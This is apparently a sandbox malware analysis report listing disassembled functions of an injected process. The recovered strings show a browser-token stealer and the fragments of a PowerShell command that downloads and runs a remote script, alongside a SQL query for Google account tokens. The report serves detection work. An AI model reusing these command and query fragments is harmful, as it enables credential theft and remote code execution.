                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
                                                                                                                                                                              • String ID: Aborting$Assertion failure: %s, at %s:%d
                                                                                                                                                                              • API String ID: 2948422844-1374795319
                                                                                                                                                                              • Opcode ID: 0342315106f231e9045af9100502df8bd51772594a5b6c3b2b067709935de26b
                                                                                                                                                                              • Instruction ID: 9fe29833d17454e5ee7b69974880b0107cd112f0410db468e414a865ac5180fd
                                                                                                                                                                              • Opcode Fuzzy Hash: 0342315106f231e9045af9100502df8bd51772594a5b6c3b2b067709935de26b
                                                                                                                                                                              • Instruction Fuzzy Hash: 410180B6A00114BBDF01AFA4DC8989B3F3DEF4A764F104064FD0A87711E631EA50DBA2
                                                                                                                                                                              Function 02A09A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09BB2
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,AccountId), ref: 02A09BCF
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09C7E
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A09C99
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                              • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                              • API String ID: 3306365304-1713091031
                                                                                                                                                                              • Opcode ID: 92054395490697572e0c06c0ad165da3733723bb1cdc5b405ddce77bcc97f4e5
                                                                                                                                                                              • Instruction ID: aa64ca2f9ec6737154525b266ff910b1bdb9fe7f2c42fd4b2a296c0f359781d9
                                                                                                                                                                              • Opcode Fuzzy Hash: 92054395490697572e0c06c0ad165da3733723bb1cdc5b405ddce77bcc97f4e5
                                                                                                                                                                              • Instruction Fuzzy Hash: 3581F932D80219ABDF01FBA4EE85ADEB776BF04355F510020F911B71A0DF60AE998F91
                                                                                                                                                                              Function 6CBC0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(00000000,00000000,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?,?,00000000,?,?), ref: 6CBC0CB3
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?), ref: 6CBC0DC1
                                                                                                                                                                              • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?), ref: 6CBC0DEC
                                                                                                                                                                                • Part of subcall function 6CBE0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6CB82AF5,?,?,?,?,?,6CB80A1B,00000000), ref: 6CBE0F1A
                                                                                                                                                                                • Part of subcall function 6CBE0F10: malloc.MOZGLUE(00000001), ref: 6CBE0F30
                                                                                                                                                                                • Part of subcall function 6CBE0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6CBE0F42
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0DFF
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000), ref: 6CBC0E16
                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0E53
                                                                                                                                                                              • PR_GetCurrentThread.NSS3(?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?,?,6CBC1444,?,?,00000000), ref: 6CBC0E65
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6CBC1444,?,00000001,?,00000000,00000000,?), ref: 6CBC0E79
                                                                                                                                                                                • Part of subcall function 6CBD1560: TlsGetValue.KERNEL32(00000000,?,6CBA0844,?), ref: 6CBD157A
                                                                                                                                                                                • Part of subcall function 6CBD1560: EnterCriticalSection.KERNEL32(?,?,?,6CBA0844,?), ref: 6CBD158F
                                                                                                                                                                                • Part of subcall function 6CBD1560: PR_Unlock.NSS3(?,?,?,?,6CBA0844,?), ref: 6CBD15B2
                                                                                                                                                                                • Part of subcall function 6CB9B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6CBA1397,00000000,?,6CB9CF93,5B5F5EC0,00000000,?,6CBA1397,?), ref: 6CB9B1CB
                                                                                                                                                                                • Part of subcall function 6CB9B1A0: free.MOZGLUE(5B5F5EC0,?,6CB9CF93,5B5F5EC0,00000000,?,6CBA1397,?), ref: 6CB9B1D2
                                                                                                                                                                                • Part of subcall function 6CB989E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6CB988AE,-00000008), ref: 6CB98A04
                                                                                                                                                                                • Part of subcall function 6CB989E0: EnterCriticalSection.KERNEL32(?), ref: 6CB98A15
                                                                                                                                                                                • Part of subcall function 6CB989E0: memset.VCRUNTIME140(6CB988AE,00000000,00000132), ref: 6CB98A27
                                                                                                                                                                                • Part of subcall function 6CB989E0: PR_Unlock.NSS3(?), ref: 6CB98A35
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1601681851-0
                                                                                                                                                                              • Opcode ID: 9b86db9cfa342e48d50d0280266f01cb62e6574c77e48ff1297b5b4f76570844
                                                                                                                                                                              • Instruction ID: 6e11a2983b8fe4721ad1ef8752500fad50e3f753efe74a05e89d4747b3bc0392
                                                                                                                                                                              • Opcode Fuzzy Hash: 9b86db9cfa342e48d50d0280266f01cb62e6574c77e48ff1297b5b4f76570844
                                                                                                                                                                              • Instruction Fuzzy Hash: B851A8F5E002916FEB009F64EC81AAF37A8EF45618F154464ED099B712FB31ED1987A3
                                                                                                                                                                              Function 6CB76E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6CB76ED8
                                                                                                                                                                              • sqlite3_value_text.NSS3(?,?), ref: 6CB76EE5
                                                                                                                                                                              • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6CB76FA8
                                                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?), ref: 6CB76FDB
                                                                                                                                                                              • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6CB76FF0
                                                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6CB77010
                                                                                                                                                                              • sqlite3_value_blob.NSS3(?,?), ref: 6CB7701D
                                                                                                                                                                              • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6CB77052
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1920323672-0
                                                                                                                                                                              • Opcode ID: 14a3a2973cc8d7cd4f8a08f1a05a85c48203d1a7c2e5d3f62baa9709eda86c06
                                                                                                                                                                              • Instruction ID: e0106ae3175b3b6d3f4990fac7f4f843d37bbd10f1dedf43c25ed83f1a784b60
                                                                                                                                                                              • Opcode Fuzzy Hash: 14a3a2973cc8d7cd4f8a08f1a05a85c48203d1a7c2e5d3f62baa9709eda86c06
                                                                                                                                                                              • Instruction Fuzzy Hash: 22619FB1E042868FDF11CF65C8407EEB7B2EF45208F184165DC25ABB51E7329915CBB1
                                                                                                                                                                              Function 02A12D70 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 121COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A12EC0
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\ProgramData\, xrefs: 02A12DA3
                                                                                                                                                                              • .ps1, xrefs: 02A12DF3
                                                                                                                                                                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 02A12E18
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 02A12E5B
                                                                                                                                                                              • ')", xrefs: 02A12E13
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              • API String ID: 2215929589-1989157005
                                                                                                                                                                              • Opcode ID: 4b61772ceebbe0bedbbb8e36d6494586df91822af0944666a9978e74ac6d3c43
                                                                                                                                                                              • Instruction ID: 4ef798be1fcda5fc4b512b64b152fc1270dae58a45a312d8226b064fbabbec30
                                                                                                                                                                              • Opcode Fuzzy Hash: 4b61772ceebbe0bedbbb8e36d6494586df91822af0944666a9978e74ac6d3c43
                                                                                                                                                                              • Instruction Fuzzy Hash: D941D931D80228ABCF11EFA4EE85ACDB7BABF04750F504061E914B7150DF70AE4A8F94
                                                                                                                                                                              Function 6CBCAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CBCAB3E,?,?,?), ref: 6CBCAC35
                                                                                                                                                                                • Part of subcall function 6CBACEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBACF16
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CBCAB3E,?,?,?), ref: 6CBCAC55
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CBCAB3E,?,?), ref: 6CBCAC70
                                                                                                                                                                                • Part of subcall function 6CBAE300: TlsGetValue.KERNEL32 ref: 6CBAE33C
                                                                                                                                                                                • Part of subcall function 6CBAE300: EnterCriticalSection.KERNEL32(?), ref: 6CBAE350
                                                                                                                                                                                • Part of subcall function 6CBAE300: PR_Unlock.NSS3(?), ref: 6CBAE5BC
                                                                                                                                                                                • Part of subcall function 6CBAE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CBAE5CA
                                                                                                                                                                                • Part of subcall function 6CBAE300: TlsGetValue.KERNEL32 ref: 6CBAE5F2
                                                                                                                                                                                • Part of subcall function 6CBAE300: EnterCriticalSection.KERNEL32(?), ref: 6CBAE606
                                                                                                                                                                                • Part of subcall function 6CBAE300: PORT_Alloc_Util.NSS3(?), ref: 6CBAE613
                                                                                                                                                                              • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CBCAC92
                                                                                                                                                                              • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CBCAB3E), ref: 6CBCACD7
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CBCAD10
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CBCAD2B
                                                                                                                                                                                • Part of subcall function 6CBAF360: TlsGetValue.KERNEL32(00000000,?,6CBCA904,?), ref: 6CBAF38B
                                                                                                                                                                                • Part of subcall function 6CBAF360: EnterCriticalSection.KERNEL32(?,?,?,6CBCA904,?), ref: 6CBAF3A0
                                                                                                                                                                                • Part of subcall function 6CBAF360: PR_Unlock.NSS3(?,?,?,?,6CBCA904,?), ref: 6CBAF3D3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2926855110-0
                                                                                                                                                                              • Opcode ID: d214edb0653627ce2a9cac3bc205370e2addf1a2745a8273381c69c10418798c
                                                                                                                                                                              • Instruction ID: d7904413b49efbc8b3a6ad4f489718736c2122807fc8c59ae88b3af04ca93d2a
                                                                                                                                                                              • Opcode Fuzzy Hash: d214edb0653627ce2a9cac3bc205370e2addf1a2745a8273381c69c10418798c
                                                                                                                                                                              • Instruction Fuzzy Hash: C2313BB1F006595FEB008F69CC409AF77B6EF8471CB188128E81597740EB31ED16CBA2
                                                                                                                                                                              Function 6CBA8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CBA8C7C
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CBA8CB0
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CBA8CD1
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6CBA8CE5
                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBA8D2E
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CBA8D62
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA8D93
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                              • Opcode ID: 530dd6b87eed08630f0f304fed26b3cd51761b099f35a189a59d815f790037b9
                                                                                                                                                                              • Instruction ID: 2a6f2456304fb6bf3a2093306bf578c650526b9a91efd2c6bcfbf41f086fd4cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 530dd6b87eed08630f0f304fed26b3cd51761b099f35a189a59d815f790037b9
                                                                                                                                                                              • Instruction Fuzzy Hash: A7316A71E04291AFE700AFA8DC4079AB7B4FF15318F14013AEA9567F50E732A925CBD2
                                                                                                                                                                              Function 6CBECEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,6CBECD93,?), ref: 6CBECEEE
                                                                                                                                                                                • Part of subcall function 6CBE14C0: TlsGetValue.KERNEL32 ref: 6CBE14E0
                                                                                                                                                                                • Part of subcall function 6CBE14C0: EnterCriticalSection.KERNEL32 ref: 6CBE14F5
                                                                                                                                                                                • Part of subcall function 6CBE14C0: PR_Unlock.NSS3 ref: 6CBE150D
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBECD93,?), ref: 6CBECEFC
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBECD93,?), ref: 6CBECF0B
                                                                                                                                                                                • Part of subcall function 6CBE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE08B4
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBECD93,?), ref: 6CBECF1D
                                                                                                                                                                                • Part of subcall function 6CBDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBD8D2D,?,00000000,?), ref: 6CBDFB85
                                                                                                                                                                                • Part of subcall function 6CBDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBDFBB1
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF47
